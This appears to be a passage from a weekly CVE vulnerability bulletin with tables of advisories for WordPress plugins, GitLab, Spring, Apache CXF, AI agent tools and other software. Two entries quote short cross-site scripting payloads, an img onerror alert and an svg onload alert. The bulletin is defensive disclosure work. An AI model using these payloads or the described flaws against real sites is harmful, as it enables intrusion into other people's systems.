| websoudan--MW WP Form | The MW WP Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'memo' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Because the memo value is stored via update_post_meta() rather than wp_insert_post(), WordPress's built-in kses and unfiltered_html protections do not apply, allowing attackers to break out of the textarea element via injected closing tags regardless of role-based content filtering. | 2026-06-10 | 4.4 | CVE-2026-8853 |
| wedevs--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_subscription_cancel() function in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel any user's subscription pack, including administrators. | 2026-06-09 | 4.3 | CVE-2026-4058 |
| weDevs--WooCommerce Conversion Tracking | Cross-Site request forgery (CSRF) vulnerability in weDevs WooCommerce Conversion Tracking allows Cross Site Request Forgery. This issue affects WooCommerce Conversion Tracking: from n/a through 2.0.10. | 2026-06-11 | 4.3 | CVE-2022-47150 |
| WP24--WP24 Domain Check | WordPress Plugin WP24 Domain Check 1.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input to the fieldnameDomain parameter. Attackers can inject JavaScript payloads through the plugin settings form at options.php that execute in the browsers of administrators viewing the settings page. | 2026-06-08 | 6.4 | CVE-2021-47984 |
| wpmessiah--Prime Elementor Addons Lightweight Elementor Widgets for Faster Pages | The Prime Elementor Addons - Lightweight Elementor Widgets for Faster Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Widget HTML Tag Settings in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit succeeds even for users without the unfiltered_html capability because the payload (e.g., 'img src=x onerror=alert(document.domain)') contains no HTML angle brackets and therefore passes through Elementor's wp_kses_post() filter unchanged at save time. | 2026-06-09 | 6.4 | CVE-2026-8677 |
| wpzoom--Recipe Card Blocks Lite | The Recipe Card Blocks Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the recipe block's 'summary' and 'notes' attributes in all versions up to, and including, 3.4.13. This is due to the 'WPZOOM_Helpers::deserialize_block_attributes' method converting unicode-encoded sequences back into HTML characters after sanitization has already been applied. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses the published post or the print view of an injected recipe. | 2026-06-08 | 6.4 | CVE-2026-3011 |
| yamcs--yamcs | Yamcs is a mission control framework. Prior to versions 5.13.0 and 5.12.7, an LDAP injection vulnerability exists in `org.yamcs.security.LdapAuthModule` when constructing search filters. The username parameter is inserted directly into the LDAP filter without proper RFC 4515 escaping. Versions 5.13.0 and 5.12.7 patch the issue. | 2026-06-10 | 4.3 | CVE-2026-42568 |
| YITH--YITH WooCommerce Product Slider Carousel | Cross-Site request forgery (CSRF) vulnerability in YITH YITH WooCommerce Product Slider Carousel allows Cross Site Request Forgery. This issue affects YITH WooCommerce Product Slider Carousel: from n/a through 1.16.0. | 2026-06-11 | 4.6 | CVE-2022-44630 |
| yoanbernabeu--grepai | A vulnerability has been found in yoanbernabeu grepai 0.35.0. This issue affects some unknown processing of the file indexer/chunker.go of the component Qdrant Backend. Such manipulation leads to use of weak hash. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-08 | 4.2 | CVE-2026-11479 |
| Yoast--Yoast Duplicate Post | Yoast Duplicate Post through 4.6 inserts an unescaped post title and permalink into the Classic Editor scheduled republish notice. Attackers can schedule a republish copy with a crafted title to execute script when an administrator views the resulting notice. | 2026-06-10 | 5.4 | CVE-2026-53740 |
| Yoast--Yoast Duplicate Post | Yoast Duplicate Post through 4.6 contains a cross-site request forgery vulnerability in the duplicate_post_dismiss_notice handler, which verifies no nonce or capability. Attackers can trick any authenticated user into sending a request that sets the duplicate_post_show_notice site option, suppressing admin notices network-wide. | 2026-06-10 | 4.3 | CVE-2026-53739 |
| yuluma--FastPicker, an order picker and order management system (oms) for WooCommerce on steroids | The FastPicker, an order picker and order management system (oms) for WooCommerce on steroids plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the settingsPage function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including toggling the webhook integration and changing the FastPicker and KDZ API URLs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8904 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. | 2026-06-09 | 3.5 | CVE-2026-48288 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. | 2026-06-09 | 3.5 | CVE-2026-48289 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. In versions up to and including 4.30.0, when `prettyUrls: true` is enabled on `@apostrophecms/file` (a documented SEO feature for serving uploaded files at clean URLs), the public pretty-URL handler builds the upstream URL using the raw `Host` HTTP request header. That URL is then `fetch`'ed and the response body + headers are streamed straight back to the requester. Because `Host` is fully attacker-controlled, an unauthenticated remote attacker can pivot the apostrophe process to issue outbound HTTP requests against any host it can reach on the private network. The path component is constrained to `/uploads/attachments/<cuid>-<slug>.<ext>` (built from a local-DB lookup), which keeps the impact narrow: cross-instance data exfiltration is neutralized by cuid uniqueness, but blind-SSRF residuals remain (network-topology mapping via response-code / timing differences and verbose proxy/WAF 404 body disclosure). As of time of publication, no known patched versions exist. | 2026-06-12 | 3.7 | CVE-2026-53607 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 1.15.2 to before 1.16.0, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain. The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request. This vulnerability is fixed in 1.16.0. | 2026-06-11 | 3.7 | CVE-2026-44489 |
| Bolt--CMS | A weakness has been identified in Bolt CMS up to 3.7.5. This vulnerability affects unknown code of the file src/Storage/Field/Type/TextType.php of the component HTML Attribute Handler. Executing a manipulation of the argument style can lead to HTML injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The GitHub repository was archived by the owner and is now read-only. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-06-08 | 3.5 | CVE-2026-11511 |
| CodeAstro--Human Resource Management System | A vulnerability was identified in CodeAstro Human Resource Management System 1.0. Affected by this issue is some unknown functionality of the file /dashboard/add_tod of the component Dashboard Interface. The manipulation of the argument todo_data leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-12 | 3.5 | CVE-2026-12129 |
| CodeAstro--Human Resource Management System | A security flaw has been discovered in CodeAstro Human Resource Management System 1.0. This affects an unknown part of the file /Projects/Add_Projects of the component Projects Management Page. The manipulation of the argument protitle results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-12 | 3.5 | CVE-2026-12130 |
| CodeAstro--Human Resource Management System | A vulnerability was identified in CodeAstro Human Resource Management System 1.0. Impacted is an unknown function of the file /notice/All_notice of the component Notice Board Management. Such manipulation of the argument Notice Title with the input `<svg onload="alert('Stored XSS Triggered by Ashik Mohamed')">` as part of POST leads to cross site scripting. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-06-08 | 2.4 | CVE-2026-11491 |
| D-Link--DGS-1100-08PD | A vulnerability was identified in D-Link DGS-1100-08PD 1.00.006. This issue affects some unknown processing of the file /etc/boa.conf of the component Web Interface. Such manipulation leads to least privilege violation. The attack may be launched remotely. The attack requires a high level of complexity. The exploitability is assessed as difficult. The exploit is publicly available and might be used. | 2026-06-08 | 3.7 | CVE-2026-11555 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, SanitizeFilePath in pkg/utils/utils.go validated that a path stayed under a safe directory by calling strings.HasPrefix(path, safedir). This is a lexical check, not a directory boundary check: /packages-extra/evil starts with /packages, so it passed. The function did not enforce a path-separator boundary, so any sibling directory whose name began with the safe-directory string was accepted. Callers included the builder's Clean handler (pkg/builder/builder.go:208) and the fetcher's Fetch / Upload handlers (pkg/fetcher/fetcher.go). A tenant who could pre-create or control a sibling directory under the fetcher / builder's shared volume could induce a write or read outside the intended safe directory. This issue has been patched in version 1.25.0. | 2026-06-10 | 3.6 | CVE-2026-50568 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.0 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to access confidential issue details due to incorrect authorization checks. | 2026-06-11 | 3.1 | CVE-2026-3553 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to hide changes from merge request diff views due to improper input handling of file names. | 2026-06-11 | 3.7 | CVE-2026-6976 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions, could have allowed an unauthenticated user to impersonate the GitLab Support Bot and inject arbitrary content via a specially crafted Service Desk email reply due to improper neutralization in email template processing. | 2026-06-11 | 2.6 | CVE-2026-9694 |
| Groww--Stock, Mutual Fund, Gold App | A vulnerability was identified in Groww Stock, Mutual Fund, Gold App up to 20260805 on Android. This affects an unknown part of the component WebView URL Handler. The manipulation leads to improper authorization in handler for custom url scheme. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2026-06-12 | 1.8 | CVE-2026-12065 |
| Huawei--HarmonyOS | Permission control vulnerability in service notifications. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 3.6 | CVE-2026-41974 |
| Huawei--HarmonyOS | Logic bypass vulnerability in the file system. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 2.4 | CVE-2026-41986 |
| imvks786--student_management_system | A vulnerability was detected in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected by this issue is some unknown functionality of the file /add.php. The manipulation of the argument name/address/fname results in cross site scripting. It is possible to launch the attack remotely. The exploit is now public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 3.5 | CVE-2026-11534 |
| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.2. Impacted is the function HttpServletResponse.sendRedirect of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/ThirdLoginController.java of the component Third-Party Login. This manipulation of the argument state causes open redirect. The attack can be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The project replied: "After evaluation, this vulnerability has low exploitability in real-world scenarios: 1) Exploiting this vulnerability requires attackers to use social engineering techniques to induce victims to actively click on an OAuth login link constructed by the attacker; it cannot be triggered passively. 2) Third-party login (DingTalk/WeChat, etc.) is an optional feature and may not be enabled in most projects." | 2026-06-08 | 3.1 | CVE-2026-11502 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, dulwich.porcelain.format_patch(outdir=...) derives each patch filename from the commit's subject line. Prior to this fix, get_summary only replaced spaces with dashes - path separators (/, \), parent-directory components (..), and other filename-hostile characters (e.g. :) were preserved verbatim and passed straight into os.path.join(outdir, f"{i:04d}-{summary}.patch"). A malicious commit subject could therefore direct the generated patch file outside the requested outdir. This is fixed in Dulwich 1.2.5. Users should upgrade to 1.2.5 or later. dulwich.patch.get_summary now mirrors git's format_sanitized_subject: only `[A-Za-z0-9._]` are kept, runs of other characters collapse to a single -, consecutive . collapse to a single ., trailing ./- are stripped, and the result is length-limited. This makes the returned string safe to embed as a filename component, so format_patch can no longer be steered out of outdir via the commit subject. Until upgrading, callers that pass untrusted commits to porcelain.format_patch can use stdout=True and write the patch to a destination they control, rather than letting format_patch choose the filename; validate the chosen path before opening - e.g. compare os.path.realpath(returned_path) against os.path.realpath(outdir) and reject any patch whose resolved path is not inside outdir; and/or pre-screen commits and refuse to format any whose subject's first line contains /, \, .., or other characters that are not safe on the target filesystem. | 2026-06-10 | 3.3 | CVE-2026-47712 |
| kokke--tiny-regex-c | A flaw has been found in kokke tiny-regex-c up to f2632c6d9ed25272987471cdb8b70395c2460bdb. This vulnerability affects the function matchstar of the file re.c of the component Pattern Handler. This manipulation causes inefficient regular expression complexity. The attack is restricted to local execution. The exploit has been published and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 3.3 | CVE-2026-11478 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 3.3 | CVE-2026-45455 |
| Microsoft--Microsoft 365 Apps for Enterprise | Protection mechanism failure in Microsoft Office Excel allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 3.3 | CVE-2026-45459 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 3.3 | CVE-2026-45466 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 3.3 | CVE-2026-45485 |
| Microsoft--Windows 10 Version 1607 | Improper input validation in Microsoft Azure Attestation service and Device Health Attestation Service allows an authorized attacker to perform spoofing with a physical attack. | 2026-06-09 | 3.9 | CVE-2026-45642 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a path traversal vulnerability in SameDirDebugInfoProvider that fails to validate filenames from ELF binary .gnu_debuglink sections before constructing file paths. Attackers can craft malicious ELF binaries with traversal sequences to probe filesystem existence and leak CRC32 hashes of arbitrary files during automatic DWARF analysis. | 2026-06-10 | 3.3 | CVE-2026-49497 |
| nationalsecurityagency--ghidra | Ghidra before 11.2 contains a use after free vulnerability in the Sleigh backend caused by undefined static initialization order of the SleighArchitecture::translators and XmlArchitectureCapability singletons. Attackers can trigger an infinite loop or denial of service during shutdown by exploiting the unsafe destruction order that causes iteration over deallocated memory. | 2026-06-10 | 2.9 | CVE-2024-58350 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.25 contains a policy bypass vulnerability in embedded runner policy that allows requests using provider aliases to compare against aliases instead of canonical provider identities. Attackers can exploit this confusion to select bundled tool access outside intended provider policy restrictions when the affected feature is enabled. | 2026-06-11 | 3.8 | CVE-2026-53809 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an improper access control vulnerability in Mattermost event handlers that fails to validate channel type metadata. Attackers can bypass intended DM policy decisions by sending crafted Mattermost events missing channel type information to process restricted content. | 2026-06-12 | 3.7 | CVE-2026-53837 |
| Red Hat--Red Hat Directory Server 11 | A heap buffer overflow flaw was found in 389 Directory Server. When audit logging is enabled, the create_masked_entry_string() function in auditlog.c copies a fixed-length password mask into a precisely-sized heap buffer without checking available space. If a short cleartext password is logged (requiring non-default CLEAR password storage or a compromised replication peer), the copy overflows the buffer, corrupting heap memory and audit log output. | 2026-06-09 | 3.3 | CVE-2026-11792 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The LDIF parser reads past the end of a heap buffer when processing attribute types with trailing semicolons during database import, causing an out-of-bounds read detectable under memory instrumentation. | 2026-06-09 | 1.9 | CVE-2026-11786 |
| rikyoz--bit7z | bit7z is a cross-platform C++ static library that allows the compression/extraction of archive files. Prior to version 4.0.12, a one-byte off-by-one error in SafeOutPathBuilder::restoreSymlink() allows an attacker to craft a .7z archive that, when extracted with bit7z on any non-Windows platform, creates a symlink escaping the intended output directory. Subsequent archive entries extracted through this symlink write arbitrary files outside the extraction directory with the permissions of the extracting process. This issue has been patched in version 4.0.12. | 2026-06-10 | 3.6 | CVE-2026-45380 |
| SAP_SE--SAP Business Objects | Under certain conditions, when an unauthorized attacker accesses a specific endpoint, SAP Business Objects application leaks sensitive information. This has a low impact on the confidentiality of the data. There is no impact on integrity and availability of the application. | 2026-06-09 | 3.7 | CVE-2026-44743 |
| shopware--shopware | Shopware is an open commerce platform. Prior to versions 6.6.10.18 and 6.7.10.1, an attacker is able to enumerate the usernames of administrator users by performing a timing attack. Versions 6.6.10.18 and 6.7.10.1 fix the issue. | 2026-06-10 | 3.7 | CVE-2026-48011 |
| SourceCodester--Inventory System | A weakness has been identified in SourceCodester Inventory System 1.0. Affected by this issue is some unknown functionality of the file header.php. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Multiple parameters might be affected. | 2026-06-08 | 3.5 | CVE-2026-11520 |
| Spring--Spring Framework | Applications may be vulnerable to a Regular Expression Denial of Service (ReDoS) attack if an attacker is able to provide a pattern which is then directly or indirectly supplied to one of the following methods in AntPathMatcher: match(String pattern, String path), matchStart(String pattern, String path), extractUriTemplateVariables(String pattern, String path). Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 3.7 | CVE-2026-41848 |
| Spring--Spring Framework | A vulnerability in Spring Expression Language (SpEL) evaluation logic allows for arbitrary zero-argument method invocation, even within restricted or read-only contexts, which may allow an attacker to invoke unintended application logic. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 3.7 | CVE-2026-41852 |
| Spring--Spring Security | Since Spring Security SAML decrypts SAML Responses as well as elements of SAML LogoutRequests and LogoutResponses without requiring a valid signature, attackers may be able to craft these SAML payloads and use the Service Provider as a decryption oracle. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 3.7 | CVE-2026-41694 |
| Spring--Spring Web Services | Wss4jSecurityInterceptor did not consistently wire Apache WSS4J ReplayCache instances into RequestData for validation-time checks. As a result, protections against replay of UsernameToken nonces and creation timestamps, Timestamp elements, and certain SAML one-time-use semantics could be ineffective even when operators configured a replay cache on the interceptor. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 3.7 | CVE-2026-41000 |
| TwiN--gatus | A vulnerability was determined in TwiN gatus 5.36.0. Impacted is the function setSessionCookie of the file security/oidc.go of the component OIDC Session Cookie Handler. Executing a manipulation can lead to sensitive cookie without secure attribute. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The reported GitHub issue was closed with the label "not planned". | 2026-06-11 | 3.7 | CVE-2026-11956 |
| yoanbernabeu--grepai | A vulnerability was determined in yoanbernabeu grepai up to 0.35.0. The affected element is the function PostgresStore.LookupByContentHash of the file indexer/chunker.go of the component Postgres Embedding Cache. Executing a manipulation of the argument content_hash can lead to use of weak hash. The attack needs to be launched locally. The attack requires a high level of complexity. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance. | 2026-06-08 | 2.5 | CVE-2026-11481 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| actualbudget--actual | Actual is a local-first personal finance tool. The `POST /openid/config` endpoint in Actual Budget's sync-server versions <= 26.4.0 exposes the full OpenID Connect configuration, including the OAuth2 `client_secret`, to any caller who knows the bootstrap password. The endpoint also lacks authentication and rate limiting, making the bootstrap password brute-forceable. Version 26.5.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-42604 |
| actualbudget--actual | Actual is an open-source personal finance application. In the macOS desktop application version 25.x (built on Electron 39.2.7), the ELECTRON_RUN_AS_NODE fuse is not disabled, allowing an attacker who can place a file on disk or control command-line arguments to invoke the signed Actual.app binary with the ELECTRON_RUN_AS_NODE=1 environment variable set. This converts the application into a Node.js REPL capable of executing arbitrary code that inherits the application's entitlements and code signature, bypassing macOS Gatekeeper review. Version 26.5.0 patches the issue. | 2026-06-12 | not yet calculated | CVE-2026-42890 |
| actualbudget--actual | Actual is an open-source personal finance application. Prior to version 26.5.0, several endpoints are affected by a path traversal vulnerability. Version 26.5.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-43872 |
| AgentChat--AgentChat | An information disclosure vulnerability in the /api/v1/user/info endpoint of AgentChat v2.3.0 allows unauthenticated attackers to obtain sensitive information, including SHA256 password hashes, via enumerating user IDs. | 2026-06-09 | not yet calculated | CVE-2026-36719 |
| agenticmail--agenticmail | AgenticMail gives AI agents real email addresses and phone numbers. Prior to version 0.9.27, @agenticmail/mcp exposes a Streamable HTTP transport when started with --http or MCP_HTTP=1. In that mode, the /mcp endpoint accepts requests without any HTTP authentication layer. A remote client can initialize a session and call tools directly. This issue has been patched in version 0.9.27. | 2026-06-12 | not yet calculated | CVE-2026-50287 |
| Aix-DB--Aix-DB | A missing authentication check on the Aix-DB "/llm/process_llm_out" endpoint allows unauthenticated clients to execute arbitrary "SELECT" SQL queries and retrieve database data, as the endpoint lacks the token validation enforced on all other application endpoints. All releases up to 1.2.4 are considered vulnerable. Status of next releases is unknown as the vulnerability has not been addressed by any patch. | 2026-06-10 | not yet calculated | CVE-2026-8335 |
| Allegra--Allegra | Allegra exportReport Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the exportReport method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the service account. Was ZDI-CAN-28208. | 2026-06-12 | not yet calculated | CVE-2026-11442 |
| Allegra--Allegra | Allegra downloadAttachment Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to execute arbitrary script on affected installations of Allegra. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the downloadAttachment method. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of arbitrary script. An attacker can leverage this vulnerability to execute script in the context of the current user. Was ZDI-CAN-28236. | 2026-06-12 | not yet calculated | CVE-2026-11443 |
| AMD--AMD EPYC 9004 Series Processors | Improper access control for register interface in the input-output memory management unit (IOMMU) could allow a privileged attacker to cause non-coherent accesses by the AMD secure processor (ASP) potentially resulting in loss of integrity. | 2026-06-09 | not yet calculated | CVE-2025-54509 |
| AMD--AMD Management Console (AMC) | The use of insecure HTTP transport within AMD optional tools could allow an attacker to conduct a man-in-the-middle attack, potentially leading to arbitrary code execution. | 2026-06-12 | not yet calculated | CVE-2026-40677 |
| AMD--AMD Prof | Improper access control in AMD uProf may allow a local attacker with user privileges to write to the kernel-shared memory section, potentially resulting in crash or denial of service. | 2026-06-09 | not yet calculated | CVE-2026-0466 |
| AMD--AMD Prof | Unrestricted resource allocation in AMD uProf may be exploitable to consume excessive system resources, potentially leading to a loss of availability. | 2026-06-09 | not yet calculated | CVE-2026-28237 |
| Apache Software Foundation--Apache Airflow Samba provider | The Apache Airflow Samba provider's `GCSToSambaOperator` joined GCS object names to the SMB destination path without a containment check, so an object named with `../` segments resolved a write path outside the configured `destination_path`. An attacker able to write objects into the source GCS bucket - typically an external data producer distinct from the trusted DAG author - could write files to arbitrary locations on the Samba target when the operator ran. Upgrade apache-airflow-providers-samba to 4.12.6 or later, which validates the resolved destination stays within `destination_path`. | 2026-06-09 | not yet calculated | CVE-2026-49818 |
| Apache Software Foundation--Apache Answer | Improper Neutralization of Alternate XSS Syntax vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. AI-generated response content was rendered in the browser without proper sanitization, allowing malicious scripts to be executed when the content was viewed. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-25688 |
| Apache Software Foundation--Apache Answer | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. Timeline-related APIs lacked proper authorization checks, allowing regular authenticated users to access deleted, private, or unapproved content and its revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-25699 |
| Apache Software Foundation--Apache Answer | Improper Restriction of Security Token Assignment vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. Previously issued administrative tokens were not invalidated after an administrator account was suspended, deleted, or deactivated, allowing continued access to administrative APIs until the token expired. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-25700 |
| Apache Software Foundation--Apache Answer | Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. A crafted TIFF image could trigger excessive memory allocation during image decoding, allowing an authenticated user to cause the server process to crash. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-33582 |
| Apache Software Foundation--Apache Answer | Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The server did not sufficiently validate user-supplied image URLs, allowing arbitrary external content to be embedded as profile images, which could expose users to unintended external requests and tracking by third-party servers. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34031 |
| Apache Software Foundation--Apache Answer | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. User-supplied content was included in notification emails without proper escaping, allowing authenticated users to inject arbitrary HTML into emails sent to other users. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34033 |
| Apache Software Foundation--Apache Answer | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The unlisted question feature did not enforce access restrictions on direct API endpoints, allowing authenticated users to discover and access unlisted questions, their answers, comments, and revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34905 |
| Apache Software Foundation--Apache CXF | Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. | 2026-06-12 | not yet calculated | CVE-2026-49875 |
| Apache Software Foundation--Apache CXF | An authentication bypass vulnerability exists in the OAuth2 TokenIntrospectionService in Apache CXF. Due to a missing 'throw' keyword in the security context check, the introspection endpoint (/services/oauth2/introspect) can be accessed by any unauthenticated network attacker. Note, however, that this check is only a safeguard for the case where someone forgot to enable authentication on the service. Users are recommended to upgrade to version 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50623 |
| Apache Software Foundation--Apache CXF | The JwtAccessTokenValidator class in Apache CXF fails to validate the 'aud' (Audience) claims of incoming JWT access tokens. This allows a JWT issued for one Resource Server to be successfully replayed against a completely different Resource Server, leading to Token Confusion/Routing attacks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50627 |
| Apache Software Foundation--Apache CXF | A logic error in OAuthRequestFilter rejects legitimate requests originating from the bound IP address, while blindly allowing requests from any other IP address. Enabling this security feature inadvertently creates an inverse security check. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50628 |
| Apache Software Foundation--Apache CXF | The 'clientId' parameter from incoming HTTP requests is directly concatenated into OAuth2 server log warning messages without sanitizing control characters. This allows an attacker to inject arbitrary content, including fake log entries, into the server's log files. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50629 |
| Apache Software Foundation--Apache CXF | A CRLF injection vulnerability exists in the OAuth2 AuthorizationUtils class. When constructing the WWW-Authenticate response header, the 'realm' parameter is concatenated without sanitizing Carriage Return (CR) and Line Feed (LF) characters. If an attacker can control the realm value, they can inject arbitrary HTTP headers or split the HTTP response entirely. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50630 |
